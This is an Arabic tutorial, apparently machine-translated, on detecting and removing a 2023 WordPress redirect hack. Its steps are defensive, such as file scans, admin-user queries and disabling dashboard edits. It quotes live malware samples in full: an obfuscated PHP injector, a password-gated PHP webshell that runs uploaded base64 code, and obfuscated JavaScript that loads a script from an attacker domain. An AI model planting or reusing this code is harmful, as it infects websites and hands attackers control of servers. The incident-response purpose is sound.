WordPress إنها بالتأكيد المنصة الأكثر استخدامًا CMS (Content Management System) لكل من المدونات والمتاجر الإلكترونية المبتدئة (مع الوحدة النمطية WooCommerce) ، مما يجعلها الأكثر استهدافًا لهجمات الكمبيوتر (القرصنة). تهدف إحدى عمليات القرصنة الأكثر استخدامًا إلى إعادة توجيه موقع الويب المخترق إلى صفحات ويب أخرى. Redirect WordPress Hack 2023 هو برنامج ضار جديد نسبيًا له تأثير إعادة توجيه الموقع بأكمله إلى صفحات ويب غير مرغوب فيها أو يمكن أن يؤدي بدوره إلى إصابة أجهزة الكمبيوتر الخاصة بالمستخدمين.
إذا تم تطوير موقعك على WordPress إلى موقع آخر ، فمن المرجح أن يكون ضحية عملية اختراق إعادة التوجيه الشهيرة بالفعل.
ستجد في هذا البرنامج التعليمي المعلومات الضرورية والنصائح المفيدة التي يمكنك من خلالها إزالة الفيروسات من موقع ويب مصاب بإعادة التوجيه WordPress Hack (Virus Redirect). من خلال التعليقات يمكنك الحصول على معلومات إضافية أو طلب المساعدة.
المحتوى
الكشف عن الفيروس الذي يقوم بإعادة توجيه المواقع WordPress
يعد الانخفاض المفاجئ وغير المبرر في حركة مرور الموقع ، أو انخفاض عدد الطلبات (في حالة المتاجر عبر الإنترنت) أو في عائدات الإعلانات ، أولى العلامات على وجود خطأ ما. كشف "Redirect WordPress Hack 2023يمكن أيضًا إجراء (إعادة توجيه الفيروسات) "بشكل مرئي" عند فتح موقع الويب وإعادة توجيهك إلى صفحة ويب أخرى.
من واقع التجربة ، تتوافق معظم برامج الويب الضارة مع متصفحات الإنترنت: Chrome, Firefox, Edge, Opera. إذا كنت من مستخدمي الكمبيوتر Mac، فهذه الفيروسات غير مرئية حقًا في المتصفح Safari. نظام الأمان من Safari منع هذه النصوص الخبيثة بصمت.
ماذا تفعل إذا كان لديك موقع ويب مصاب Redirect WordPress Hack
آمل أن تكون الخطوة الأولى هي عدم الذعر أو حذف الموقع. حتى الملفات المصابة بالفيروسات لا ينبغي حذفها في البداية. تحتوي على معلومات قيمة يمكن أن تساعدك على فهم مكان الاختراق الأمني وما الذي أثر على الفيروس. طريقة العمل.
أغلق الموقع للجمهور.
كيف تغلق موقع الفيروس للزوار؟ أبسطها هو استخدام مدير DNS وحذف IP لـ "A" (اسم المجال) أو تحديد IP غير موجود. وبالتالي ، سيتم حماية زوار الموقع من هذا redirect WordPress hack مما قد يؤدي بهم إلى صفحات الويب الخاصة بالفيروسات أو الرسائل الاقتحامية.
إذا كنت تستخدم CloudFlare بصفتك مدير DNS ، يمكنك تسجيل الدخول إلى الحساب وحذف سجلات DNS "A"لاسم المجال. وبالتالي ، سيظل المجال المصاب بالفيروس بدون IP ، ولن يكون من الممكن الوصول إليه من الإنترنت.
تقوم بنسخ عنوان IP الخاص بالموقع و "توجيهه" بحيث لا يمكن لأحد سواك الوصول إليه. من جهاز الكمبيوتر الخاص بك.
كيفية تغيير عنوان IP الحقيقي لموقع ويب على أجهزة الكمبيوتر Windows?
غالبًا ما تُستخدم الطريقة لمنع الوصول إلى مواقع ويب معينة عن طريق تحرير ملف "المضيفين".
1. تفتح Notepad أو محرر نصوص آخر (مع الحقوق administrator) وتحرير الملف "hosts". تقع في:
C:\Windows\System32\drivers\etc\hosts2. في ملف "hosts" ، أضف "route" إلى عنوان IP الحقيقي لموقعك على الويب. تم حذف IP أعلاه من مدير DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. حفظ الملف والوصول إلى موقع الويب في المتصفح.
إذا لم يتم فتح موقع الويب ولم تفعل شيئًا خاطئًا في ملف "المضيفين" ، فمن المحتمل أن يكون هذا هو ذاكرة التخزين المؤقت لنظام أسماء النطاقات.
لمسح ذاكرة التخزين المؤقت DNS على نظام التشغيل Windows، يفتح Command Prompt، حيث تقوم بتشغيل الأمر:
ipconfig /flushdnsكيفية تغيير عنوان IP الحقيقي لموقع ويب على أجهزة الكمبيوتر Mac / Macالكتاب؟
لمستخدمي الكمبيوتر Mac من الأسهل إلى حد ما تغيير عنوان IP الحقيقي لموقع الويب.
1. افتح الأداة المساعدة Terminal.
2. تشغيل سطر الأوامر (يتطلب كلمة مرور النظام للتشغيل):
sudo nano /etc/hosts3. نفس الشيء بالنسبة لأجهزة الكمبيوتر Windows، أضف عنوان IP الحقيقي للمجال.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. احفظ التغييرات. Ctrl+X (y).
بعد "التوجيه" ، تكون أنت الشخص الوحيد الذي يمكنه الوصول إلى موقع الويب المصاب Redirect WordPress Hack.
نسخ احتياطي كامل للموقع - الملفات وقاعدة البيانات
حتى لو كانت مصابة بـ "redirect WordPress hack"، فإن التوصية هي عمل نسخة احتياطية عامة من الموقع بالكامل. الملفات وقاعدة البيانات. ربما يمكنك أيضًا حفظ نسخة محلية من كلا الملفين من public / public_html فضلا عن قاعدة البيانات.
تحديد الملفات المصابة وتلك المعدلة بواسطة Redirect WordPress Hack 2023
الملفات المستهدفة الرئيسية لملفات WordPress يوجد index.php (في الجذر) ، header.php, index.php سي footer.php من الموضوع WordPress أصول. افحص هذه الملفات يدويًا وحدد التعليمات البرمجية الضارة أو البرامج النصية الخبيثة.
في عام 2023 ، انتشر فيروس من "Redirect WordPress Hack" ضعه في index.php رمز النموذج:
(لا أوصي بتشغيل هذه الرموز!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>فك هذا نص ضار إنه في الأساس نتيجة إصابة موقع الويب WordPress. إنه ليس البرنامج النصي وراء البرنامج الضار ، إنه البرنامج النصي الذي يجعل من الممكن إعادة توجيه صفحة الويب المصابة. إذا قمنا بفك تشفير البرنامج النصي أعلاه ، فسنحصل على:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
لتحديد جميع الملفات الموجودة على الخادم التي تحتوي على هذا الرمز ، من الجيد أن يكون لديك حق الوصول SSH إلى الخادم لتشغيل فحص الملفات وإدارة سطور الأوامر Linux.
هذا الموضوع ذو علاقة بـ: كيفية معرفة ما إذا كانت مدونتك مصابة أم لا ، بمساعدة Google Search . (WordPress فايروس)
يوجد أدناه أمران مفيدان بالتأكيد في تحديد الملفات والملفات التي تم تعديلها مؤخرًا والتي تحتوي على رمز معين (سلسلة).
كيف ترى على Linux تم تغيير ملفات PHP في آخر 24 ساعة أم في إطار زمني آخر؟
ترتيب "find”سهل الاستخدام للغاية ويسمح بالتخصيص لتعيين الفترة الزمنية ومسار البحث ونوع الملفات.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"ستتلقى في الإخراج معلومات حول تاريخ ووقت تعديل الملف وأذونات الكتابة / القراءة / التنفيذ (chmod) وإلى أي مجموعة / مستخدم تنتمي.
إذا كنت تريد التحقق قبل أيام أخرى ، فغيّر القيمة "-mtime -1" او استعمل "-mmin -360"لدقائق (6 ساعات).
كيفية البحث عن رمز (سلسلة) داخل ملفات PHP و Java؟
سطر الأوامر "find" الذي يسمح لك بالعثور بسرعة على جميع ملفات PHP أو Java التي تحتوي على رمز معين هو كما يلي:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +سيقوم الأمر بالبحث عن الملفات وعرضها .php سي .js تحتوي "uJjBRODYsU".
بمساعدة الأمرين أعلاه ، ستكتشف بسهولة الملفات التي تم تعديلها مؤخرًا والتي تحتوي على كود برامج ضارة.
يزيل التعليمات البرمجية الضارة من الملفات المعدلة دون المساس بالشفرة الصحيحة. في السيناريو الخاص بي ، تم وضع البرنامج الضار قبل فتحه <head>.
عند تنفيذ أمر "find" الأول ، من الممكن جدًا اكتشاف ملفات جديدة على الخادم ، وليست ملكك WordPress ولا تضعه هناك بواسطتك. الملفات التي تنتمي إلى نوع الفيروس Redirect WordPress Hack.
في السيناريو الذي قمت بالتحقيق فيه ، ملفات النموذج "wp-log-nOXdgD.php". هذه هي ملفات "النشر" التي تحتوي أيضًا على تعليمات برمجية ضارة يستخدمها الفيروس لإعادة التوجيه.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}الغرض من نوع الملفات "wp-log-*"هو نشر فيروس الاختراق لإعادة التوجيه إلى مواقع الويب الأخرى المستضافة على الخادم. إنه رمز لبرامج ضارة من النوع "webshell"تتألف من أ القسم الأساسي (حيث يتم تعريف بعض المتغيرات المشفرة) و o قسم التنفيذ من خلالها يحاول المهاجم تحميل وتنفيذ تعليمات برمجية ضارة على النظام.
إذا كان هناك متغير POST اسم الشيئ 'bhوقيمته المشفرة MD5 مساوي ل "8f1f964a4b4d8d1ac3f0386693d28d03"، ثم يظهر البرنامج النصي لكتابة المحتوى المشفر base64 متغير آخر يسمى "b3'في ملف مؤقت ثم يحاول تضمين هذا الملف المؤقت.
إذا كان هناك متغير POST أو GET اسم الشيئ 'tick'، سيستجيب البرنامج النصي بالقيمة MD5 من السلسلة "885".
لتحديد جميع الملفات الموجودة على الخادم التي تحتوي على هذا الرمز ، اختر سلسلة شائعة ، ثم قم بتشغيل الأمر "find"(على غرار ما ورد أعلاه). احذف جميع الملفات التي تحتوي على رمز البرنامج الضار هذا.
استغلت ثغرة أمنية من قبل Redirect WordPress Hack
على الأرجح يصل فيروس إعادة التوجيه هذا عبر استغلال مستخدم الإدارة WordPress أو عن طريق تحديد المكون الإضافي الضعيف الذي يسمح بإضافة مستخدمين بامتيازات administrator.
لمعظم المواقع المبنية على النظام الأساسي WordPress إنه ممكن تحرير السمة أو ملفات البرنامج المساعدمن واجهة الإدارة (Dashboard). وبالتالي ، يمكن لأي شخص ضار إضافة تعليمات برمجية ضارة إلى ملفات السمات لإنشاء البرامج النصية الموضحة أعلاه.
مثال على رمز البرامج الضارة هذا هو:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript المحددة في عنوان الموضوع WordPress، مباشرة بعد فتح الملصق <head>.
من الصعب جدًا فك شفرة جافا سكريبت هذه ، ولكن من الواضح أنها تستعلم عن عنوان ويب آخر من المكان الذي من المرجح أن يجلب نصوصًا برمجية أخرى لإنشاء الملفات "wp-log-*"التي تحدثت عنها أعلاه.
ابحث عن هذا الرمز واحذفه من جميع الملفات PHP متأثر.
بقدر ما أستطيع أن أقول ، كان هذا الرمز يضاف يدويا بواسطة مستخدم جديد بامتيازات إدارية.
لذلك ، لمنع إضافة البرامج الضارة من لوحة التحكم ، من الأفضل تعطيل خيار التحرير WordPress المظاهر / المكونات الإضافية من لوحة القيادة.
قم بتحرير الملف wp-config.php وأضف الأسطر:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);بعد إجراء هذا التغيير ، لا يوجد مستخدم WordPress لن تتمكن بعد الآن من تحرير الملفات من لوحة التحكم الرئيسية.
تحقق من المستخدمين الذين لهم دور Administrator
يوجد أدناه استعلام SQL يمكنك استخدامه للبحث عن مستخدمين يقومون بدور administrator في المنصة WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'سيعود هذا الاستعلام إلى جميع المستخدمين الموجودين في الجدول wp_users الذي عين دور administrator. يتم إجراء الاستعلام أيضًا للجدول wp_usermeta للبحث في ميتاwp_capabilities، الذي يحتوي على معلومات حول أدوار المستخدم.
طريقة أخرى هي التعرف عليهم من: Dashboard → Users → All Users → Administrator. ومع ذلك ، هناك ممارسات يمكن من خلالها إخفاء المستخدم في لوحة Dashboard. لذلك ، فإن أفضل طريقة لرؤية المستخدمين "Administrator"في WordPress هو أمر SQL أعلاه.
في حالتي ، حددت في قاعدة البيانات اسم المستخدم "wp-import-user". موحية جدا.
أيضا من هنا يمكنك رؤية تاريخ ووقت المستخدم WordPress تم انشائه. معرف المستخدم مهم جدًا أيضًا لأنه يبحث في سجلات الخادم. بهذه الطريقة يمكنك مشاهدة كل نشاط هذا المستخدم.
حذف المستخدمين الذين لهم دور administrator الذي لا تعرفه إذن تغيير كلمات المرور لجميع المستخدمين الإداريين. محرر ، مؤلف ، Administrator.
قم بتغيير كلمة مرور مستخدم قاعدة بيانات SQL من موقع الويب المتأثر.
بعد اتخاذ هذه الخطوات ، يمكن إعادة تشغيل موقع الويب لجميع المستخدمين.
ومع ذلك ، ضع في اعتبارك أن ما قدمته أعلاه هو ربما واحد من آلاف السيناريوهات التي يُصاب بها أحد مواقع الويب Redirect WordPress Hack في عام 2023.
إذا أصيب موقع الويب الخاص بك وتحتاج إلى مساعدة أو إذا كان لديك أي أسئلة ، فإن قسم التعليقات مفتوح.
